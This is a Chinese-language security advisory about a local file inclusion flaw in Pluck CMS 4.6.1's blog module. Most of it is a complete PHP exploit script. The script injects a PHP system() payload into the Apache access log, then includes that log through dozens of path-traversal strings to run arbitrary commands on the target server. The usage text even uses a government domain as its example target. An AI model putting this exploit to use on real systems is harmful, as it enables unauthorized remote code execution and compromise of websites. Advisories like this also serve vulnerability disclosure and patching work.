发布日期：2009-03-23
更新日期：2009-03-24

受影响系统：

somp Pluck CMS 4.6.1

描述：

---

BUGTRAQ  ID: 34207

pluck是用php编写的简单内容管理系统。

pluck的\data\modules\blog\module_pages_site.php模块中没有正确地过滤用户所提交的请求参数：

  ...

      $includepage = 'blog_include.php';
      //Only set 'view post'-page if a post has been specified
      if (isset($_GET['post'])) {
    //Check if post exists, and include information
       if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
        include('data/settings/modules/blog/posts/'.$_GET['post']);
        $module_page['viewpost'] = $post_title;
       }
      }
...

远程攻击者可以通过向服务器提交特制的HTTP POST请求包含任意本地资源，导致执行任意代码。

<*来源：Alfons Luja
  
  链接：http://secunia.com/advisories/34415/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<?php

if($argc < 4) die("Use host path command [www.penatgon.gov /pluck ls l]\n");

set_time_limit(0);
error_reporting(0);

$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$command = $argv[4];

//add something if not w00rking ;x

$shell = array(  
         "<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>",
         "../apache/logs/access.log",
         "../../apache/logs/access.log",
         "../../../apache/logs/access.log",
         "../../../../apache/logs/access.log",
         "../../../../../apache/logs/access.log",
         "../../../../../../apache/logs/access.log",
         "../../../../../../../apache/logs/access.log",
         "../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../../../apache/logs/access.log",
         "../var/log/httpd/access.log",
         "../../var/log/httpd/access.log",
         "../../../var/log/httpd/access.log",
         "../../../../var/log/httpd/access.log",
         "../../../../../var/log/httpd/access.log",
         "../../../../../../var/log/httpd/access.log",
         "../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../../../var/log/httpd/access.log",
         "../var/log/apache/access.log",
         "../../var/log/apache/access.log",
         "../../../var/log/apache/access.log",
         "../../../../var/log/apache/access.log",
         "../../../../../var/log/apache/access.log",
         "../../../../../../var/log/apache/access.log",
         "../../../../../../../var/log/apache/access.log",
         "../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../../../var/log/apache/access.log",
         "../usr/local/apache2/logs/access.log",
         "../../usr/local/apache2/logs/access.log",
         "../../../usr/local/apache2/logs/access.log",
         "../../../../usr/local/apache2/logs/access.log",
         "../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../../../usr/local/apache2/logs/access.log",
   );
function _hdr($int){   //Mia&sup3;o nie by&aelig; file_get_contents
      
        global $shell,$host,$path;
        $header .= "GET /$host/$path/$shell[$int]  HTTP/1.1\r\n";
        $header .= "Host: $host\r\n";
        $header .= "User-Agent: _echo [ru] (Win6.66; @)\r\n";
        $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $header .= "Accept-Language: en-us,en;q=0.5\r\n";
        $header .= "Accept-Encoding: gzip,deflate\r\n";
        $header .= "Connection: close\r\n\r\n";
        return $header;


}


function _inject($hosts,$ports){
    
           $hnd = fsockopen($hosts,$ports,$errno, $errstr, 30);
           if(!$hnd) die("Injection errr $errstr\n");
           fwrite($hnd,_hdr(0));
           fclose($hnd);  


}

function _result($data){

          $ret = explode(' e[Ho_trip ',$data);
            if($ret[1] != ""){
              for($i = 1;$i<count($ret);$i++){
               $ret_2 = explode(' d34th_trip',$ret[$i]);  
                   if($i - count($ret) == -1){
                     if($ret_2[0] != ""){
                        echo($ret_2[0]);
                     } else {
                        die("Exploit failed!!\n");
                     }
               }
              }    
              
            }

}

function _exploit($hosts,$paths){

        global $shell;
        $rets = "";
        $count = count($shell);

        for($i=1;$i<$count;$i++){
            
            $tab = file_get_contents("http://".$hosts."/".$paths."/data/modules/blog/module_pages_site.php?post=$shell[$i]");
           _result($tab);
  
        }

        
}
echo("---- pluck v 4.6.1 -----\n\n".
     "Autor: Alfons Luja\n".
     "Target: $host\n".
     "Path: $path\n".
     "Port: $port\n".
     "COM: $command\n".
     "Ex: poc.php www.target.com 80 pluck \"dir\"\n\n");

    _inject($host,$port);
    _exploit($host,$path);

?>

建议：

---

厂商补丁：

somp
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.pluck-cms.org/

浏览次数：2491
严重程度：0（网友投票）